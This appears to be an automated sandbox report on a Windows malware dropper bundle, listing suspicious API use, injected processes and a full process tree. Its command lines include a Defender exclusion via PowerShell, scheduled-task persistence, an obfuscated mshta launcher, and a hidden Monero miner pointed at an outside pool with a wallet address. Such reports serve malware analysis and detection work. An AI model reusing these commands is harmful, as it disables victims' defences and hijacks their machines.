Thu20bc9ea26f.exepowershell.exeExplorer.EXErundll32.exesvchost.execmd.exeWerFault.exepid process 2216 Thu20bc9ea26f.exe 2216 Thu20bc9ea26f.exe 3552 powershell.exe 3552 powershell.exe 3552 powershell.exe 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 1828 rundll32.exe 1828 rundll32.exe 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 2684 svchost.exe 2684 svchost.exe 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3552 powershell.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid / process
3064 Explorer.EXE
Suspicious behavior: MapViewOfSection 15 IoCs
Processes:
pid / process
2216 Thu20bc9ea26f.exe
7080 MicrosoftEdgeCP.exe
7080 MicrosoftEdgeCP.exe
7080 MicrosoftEdgeCP.exe
7080 MicrosoftEdgeCP.exe
6988 dX9c0VLsY6QZmDeHO24bcfz5.exe
10192 8E7A.exe
5664 HcY5k_KrNgbxj3FPdJLM6vgP.exe
2144 ctghugg
10444 ctghugg
14924 MicrosoftEdgeCP.exe
14924 MicrosoftEdgeCP.exe
16396 aeghugg
14924 MicrosoftEdgeCP.exe
14924 MicrosoftEdgeCP.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Thu20f2cf5e0c.exeThu203b503b429e68.exepowershell.exe8684174.scrThu2090b5515d63b2.exePublicDwlBrowser1100.exeWerFault.exeBearVpn 3.exe4873306.exerundll32.exesvchost.exeWerFault.execmd.exesvchost.exeWerFault.exeWerFault.exe___YHDG34.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3048 Thu20f2cf5e0c.exe Token: SeCreateTokenPrivilege 4512 Thu203b503b429e68.exe Token: SeAssignPrimaryTokenPrivilege 4512 Thu203b503b429e68.exe Token: SeLockMemoryPrivilege 4512 Thu203b503b429e68.exe Token: SeIncreaseQuotaPrivilege 4512 Thu203b503b429e68.exe Token: SeMachineAccountPrivilege 4512 Thu203b503b429e68.exe Token: SeTcbPrivilege 4512 Thu203b503b429e68.exe Token: SeSecurityPrivilege 4512 Thu203b503b429e68.exe Token: SeTakeOwnershipPrivilege 4512 Thu203b503b429e68.exe Token: SeLoadDriverPrivilege 4512 Thu203b503b429e68.exe Token: SeSystemProfilePrivilege 4512 Thu203b503b429e68.exe Token: SeSystemtimePrivilege 4512 Thu203b503b429e68.exe Token: SeProfSingleProcessPrivilege 4512 Thu203b503b429e68.exe Token: SeIncBasePriorityPrivilege 4512 Thu203b503b429e68.exe Token: SeCreatePagefilePrivilege 4512 Thu203b503b429e68.exe Token: SeCreatePermanentPrivilege 4512 Thu203b503b429e68.exe Token: SeBackupPrivilege 4512 Thu203b503b429e68.exe Token: SeRestorePrivilege 4512 Thu203b503b429e68.exe Token: SeShutdownPrivilege 4512 Thu203b503b429e68.exe Token: SeDebugPrivilege 4512 Thu203b503b429e68.exe Token: SeAuditPrivilege 4512 Thu203b503b429e68.exe Token: SeSystemEnvironmentPrivilege 4512 Thu203b503b429e68.exe Token: SeChangeNotifyPrivilege 4512 Thu203b503b429e68.exe Token: SeRemoteShutdownPrivilege 4512 Thu203b503b429e68.exe Token: SeUndockPrivilege 4512 Thu203b503b429e68.exe Token: SeSyncAgentPrivilege 4512 Thu203b503b429e68.exe Token: SeEnableDelegationPrivilege 4512 Thu203b503b429e68.exe Token: SeManageVolumePrivilege 4512 Thu203b503b429e68.exe Token: SeImpersonatePrivilege 4512 Thu203b503b429e68.exe Token: SeCreateGlobalPrivilege 4512 Thu203b503b429e68.exe Token: 31 4512 
Thu203b503b429e68.exe Token: 32 4512 Thu203b503b429e68.exe Token: 33 4512 Thu203b503b429e68.exe Token: 34 4512 Thu203b503b429e68.exe Token: 35 4512 Thu203b503b429e68.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 4956 8684174.scr Token: SeDebugPrivilege 4564 Thu2090b5515d63b2.exe Token: SeDebugPrivilege 3844 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 4372 WerFault.exe Token: SeDebugPrivilege 1352 BearVpn 3.exe Token: SeDebugPrivilege 3860 4873306.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 2684 svchost.exe Token: SeRestorePrivilege 1372 WerFault.exe Token: SeBackupPrivilege 1372 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 3496 cmd.exe Token: SeAuditPrivilege 2336 svchost.exe Token: SeDebugPrivilege 1372 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeAuditPrivilege 2336 svchost.exe Token: SeDebugPrivilege 1248 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeAuditPrivilege 2336 svchost.exe Token: SeDebugPrivilege 4448 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 4944 ___YHDG34.exe Token: SeDebugPrivilege 508 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
Processes:
pid / process
3064 Explorer.EXE
5448 ultramediaburner.tmp
6148 installer.exe
3064 Explorer.EXE
3064 Explorer.EXE
3064 Explorer.EXE
3064 Explorer.EXE
3064 Explorer.EXE
3064 Explorer.EXE
5484 chrome.exe
3064 Explorer.EXE
3064 Explorer.EXE
5484 chrome.exe
5484 chrome.exe
3064 Explorer.EXE
3064 Explorer.EXE
10936 client32.exe
10396 IDownload.tmp
3064 Explorer.EXE
3064 Explorer.EXE
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Explorer.EXEpid process 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
pid / process
3064 Explorer.EXE
5824 MicrosoftEdge.exe
7080 MicrosoftEdgeCP.exe
7080 MicrosoftEdgeCP.exe
6500 cmd.exe
7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe
12732 MicrosoftEdge.exe
7916 MicrosoftEdge.exe
4932 cmd.exe
14924 MicrosoftEdgeCP.exe
14924 MicrosoftEdgeCP.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exe setup_installer.exe setup_install.exe cmd.exe cmd.exe cmd.exe cmd.exe cmd.exe cmd.exe cmd.exe
description | pid | process | target process
PID 4880 wrote to memory of 4920 | 4880 | setup_x86_x64_install.exe | setup_installer.exe
PID 4880 wrote to memory of 4920 | 4880 | setup_x86_x64_install.exe | setup_installer.exe
PID 4880 wrote to memory of 4920 | 4880 | setup_x86_x64_install.exe | setup_installer.exe
PID 4920 wrote to memory of 5032 | 4920 | setup_installer.exe | setup_install.exe
PID 4920 wrote to memory of 5032 | 4920 | setup_installer.exe | setup_install.exe
PID 4920 wrote to memory of 5032 | 4920 | setup_installer.exe | setup_install.exe
PID 5032 wrote to memory of 4160 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 4160 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 4160 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 4176 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 4176 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 4176 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3752 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3752 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3752 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3348 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3348 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3348 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3472 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3472 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3472 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3560 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3560 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3560 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3524 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3524 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3524 | 5032 | setup_install.exe | cmd.exe
PID 4160 wrote to memory of 3552 | 4160 | cmd.exe | powershell.exe
PID 4160 wrote to memory of 3552 | 4160 | cmd.exe | powershell.exe
PID 4160 wrote to memory of 3552 | 4160 | cmd.exe | powershell.exe
PID 5032 wrote to memory of 4220 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 4220 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 4220 | 5032 | setup_install.exe | cmd.exe
PID 3752 wrote to memory of 3048 | 3752 | cmd.exe | Thu20f2cf5e0c.exe
PID 3752 wrote to memory of 3048 | 3752 | cmd.exe | Thu20f2cf5e0c.exe
PID 3348 wrote to memory of 312 | 3348 | cmd.exe | Thu20dae7c52bc0856.exe
PID 3348 wrote to memory of 312 | 3348 | cmd.exe | Thu20dae7c52bc0856.exe
PID 5032 wrote to memory of 4248 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 4248 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 4248 | 5032 | setup_install.exe | cmd.exe
PID 4176 wrote to memory of 3972 | 4176 | cmd.exe | Thu20c467678e2c.exe
PID 4176 wrote to memory of 3972 | 4176 | cmd.exe | Thu20c467678e2c.exe
PID 4176 wrote to memory of 3972 | 4176 | cmd.exe | Thu20c467678e2c.exe
PID 3560 wrote to memory of 4132 | 3560 | cmd.exe | Thu2026c04e7218e1.exe
PID 3560 wrote to memory of 4132 | 3560 | cmd.exe | Thu2026c04e7218e1.exe
PID 3560 wrote to memory of 4132 | 3560 | cmd.exe | Thu2026c04e7218e1.exe
PID 3472 wrote to memory of 420 | 3472 | cmd.exe | Thu20a5f7ccaa78.exe
PID 3472 wrote to memory of 420 | 3472 | cmd.exe | Thu20a5f7ccaa78.exe
PID 3472 wrote to memory of 420 | 3472 | cmd.exe | Thu20a5f7ccaa78.exe
PID 5032 wrote to memory of 740 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 740 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 740 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3360 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3360 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 3360 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 1876 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 1876 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 1876 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 2828 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 2828 | 5032 | setup_install.exe | cmd.exe
PID 5032 wrote to memory of 2828 | 5032 | setup_install.exe | cmd.exe
PID 740 wrote to memory of 1788 | 740 | cmd.exe | Thu2025d6674aed72ba.exe
PID 740 wrote to memory of 1788 | 740 | cmd.exe | Thu2025d6674aed72ba.exe
PID 740 wrote to memory of 1788 | 740 | cmd.exe | Thu2025d6674aed72ba.exe
Processes
- c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
  PID:2616
  - C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T /R
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:7540
- C:\Windows\Explorer.EXE
  C:\Windows\Explorer.EXE
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3064
  - C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    - Suspicious use of WriteProcessMemory
    PID:4880
    - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:4920
      - C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID:5032
        - C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious use of WriteProcessMemory
          PID:4160
          - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:3552
        - C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Thu20c467678e2c.exe
          - Suspicious use of WriteProcessMemory
          PID:4176
          - C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20c467678e2c.exe
            Thu20c467678e2c.exe
            - Executes dropped EXE
            PID:3972
            - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
              "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
              - Executes dropped EXE
              PID:4104
              - C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                PID:6524
                - C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                  - Creates scheduled task(s)
                  PID:6952
              - C:\Users\Admin\AppData\Roaming\services64.exe
                "C:\Users\Admin\AppData\Roaming\services64.exe"
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
                PID:7004
                - C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                  PID:5592
                  - C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                    - Creates scheduled task(s)
                    PID:2768
                - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  PID:8964
                - C:\Windows\explorer.exe
                  C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                  PID:6764
            - C:\Users\Admin\AppData\Local\Temp\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
              - Executes dropped EXE
              PID:896
              - C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 808
                - Program crash
                PID:3496
              - C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 828
                - Program crash
                PID:1248
              - C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 896
                - Program crash
                - Suspicious use of AdjustPrivilegeToken
                PID:508
              - C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1020
                - Executes dropped EXE
                - Program crash
                - Suspicious use of AdjustPrivilegeToken
                PID:4372
              - C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1088
                - Program crash
                PID:4692
              - C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1076
                - Program crash
                - Suspicious use of AdjustPrivilegeToken
                PID:1248
              - C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1036
                - Suspicious use of NtCreateProcessExOtherParentProcess
                - Program crash
                PID:5092
            - C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
              "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
              PID:1352
              - C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 1348
                - Program crash
                PID:5604
            - C:\Users\Admin\AppData\Local\Temp\2.exe
              "C:\Users\Admin\AppData\Local\Temp\2.exe"
              PID:4372
              - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                - Executes dropped EXE
                PID:1044
                - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                  - Modifies data under HKEY_USERS
                  PID:15800
            - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
              "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
              PID:3844
              - C:\ProgramData\4873306.exe
                "C:\ProgramData\4873306.exe"
                - Executes dropped EXE
                - Suspicious use of AdjustPrivilegeToken
                PID:3860
                - C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 3860 -s 1768
                  - Program crash
                  PID:5556
              - C:\ProgramData\6650495.exe
                "C:\ProgramData\6650495.exe"
                - Executes dropped EXE
                - Checks BIOS information in registry
                - Checks whether UAC is enabled
                - Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:1872
        - C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Thu20f2cf5e0c.exe
          - Suspicious use of WriteProcessMemory
          PID:3752
          - C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20f2cf5e0c.exe
            Thu20f2cf5e0c.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            PID:3048
            - C:\Users\Admin\AppData\Roaming\8684174.scr
              "C:\Users\Admin\AppData\Roaming\8684174.scr" /S
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
              PID:4956
              - C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 4956 -s 1768
                - Program crash
                PID:5228
            - C:\Users\Admin\AppData\Roaming\8337894.scr
              "C:\Users\Admin\AppData\Roaming\8337894.scr" /S
              - Executes dropped EXE
              PID:6136
            - C:\Users\Admin\AppData\Roaming\5581443.scr
              "C:\Users\Admin\AppData\Roaming\5581443.scr" /S
              - Executes dropped EXE
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:1968
        - C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Thu20dae7c52bc0856.exe
          - Suspicious use of WriteProcessMemory
          PID:3348
          - C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20dae7c52bc0856.exe
            Thu20dae7c52bc0856.exe
            - Executes dropped EXE
            PID:312
        - C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Thu20a5f7ccaa78.exe
          - Suspicious use of WriteProcessMemory
          PID:3472
          - C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
            Thu20a5f7ccaa78.exe
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            PID:420
            - C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
              C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
              - Executes dropped EXE
              PID:524
            - C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
              C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20a5f7ccaa78.exe
              - Executes dropped EXE
              PID:2364
        - C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Thu203b503b429e68.exe
          PID:3524
          - C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203b503b429e68.exe
            Thu203b503b429e68.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            PID:4512
            - C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im chrome.exe
              PID:5532
              - C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im chrome.exe
                - Kills process with taskkill
                PID:6096
        - C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Thu2094524d5e5b.exe
          PID:4220
          - C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2094524d5e5b.exe
            Thu2094524d5e5b.exe
            - Executes dropped EXE
            - Checks computer location settings
            PID:4404
            - C:\Users\Admin\Documents\72HVEuHc1LiCdlGyE_KhQi1n.exe
              "C:\Users\Admin\Documents\72HVEuHc1LiCdlGyE_KhQi1n.exe"
              - Executes dropped EXE
              PID:3924
            - C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
              "C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              PID:7252
              - C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
                C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
                PID:8404
              - C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
                C:\Users\Admin\Documents\XBR5d0OipcZIAALv0Ds4mA_b.exe
                PID:8624
            - C:\Users\Admin\Documents\0IuDRAJglDutmXwQOEhSBXDa.exe
              "C:\Users\Admin\Documents\0IuDRAJglDutmXwQOEhSBXDa.exe"
              - Executes dropped EXE
              PID:7288
            - C:\Users\Admin\Documents\Gn9Jky4_EDbOI58YpznCytCC.exe
              "C:\Users\Admin\Documents\Gn9Jky4_EDbOI58YpznCytCC.exe"
              - Executes dropped EXE
              PID:7316
            - C:\Users\Admin\Documents\_zmz9h_0oO1LiMAufsS4G9Hx.exe
              "C:\Users\Admin\Documents\_zmz9h_0oO1LiMAufsS4G9Hx.exe"
              - Executes dropped EXE
              - Checks BIOS information in registry
              - Loads dropped DLL
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:7388
              - C:\Windows\SysWOW64\cmd.exe
                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\_zmz9h_0oO1LiMAufsS4G9Hx.exe"
                PID:9868
                - C:\Windows\SysWOW64\timeout.exe
                  timeout /T 10 /NOBREAK
                  - Delays execution with timeout.exe
                  PID:9484
            - C:\Users\Admin\Documents\a3nSYK3QiDj60t0XJFF7UlrQ.exe
              "C:\Users\Admin\Documents\a3nSYK3QiDj60t0XJFF7UlrQ.exe"
              - Executes dropped EXE
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              - Suspicious use of SetWindowsHookEx
              PID:7308
            - C:\Users\Admin\Documents\tH0ctc2jiXFQrqD_hc1dkUzk.exe
              "C:\Users\Admin\Documents\tH0ctc2jiXFQrqD_hc1dkUzk.exe"
              - Executes dropped EXE
              PID:7408
            - C:\Users\Admin\Documents\3j37Icfa8ZkdKtGcGgFo5hHI.exe
              "C:\Users\Admin\Documents\3j37Icfa8ZkdKtGcGgFo5hHI.exe"
              - Executes dropped EXE
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:7452
            - C:\Users\Admin\Documents\EWtGNadfMrzbtpsBi9aWUtQT.exe
              "C:\Users\Admin\Documents\EWtGNadfMrzbtpsBi9aWUtQT.exe"
              - Executes dropped EXE
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:7584
            - C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
              "C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              PID:7576
              - C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
                C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
                - Suspicious use of SetThreadContext
                PID:9168
                - C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
                  C:\Users\Admin\Documents\q8G7pt2bO5fMdxqZP9uX1JCU.exe
                  PID:6200
            - C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe
              "C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"
              - Executes dropped EXE
              PID:7708
              - C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )
                PID:8520
                - C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF ""== "" for %w In ("C:\Users\Admin\Documents\usyw5ZngVKxU1DoBnfAsyAxL.exe" ) do taskkill /F -iM "%~nxw"
                  PID:8372
                  - C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe
                    Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj
                    PID:8424
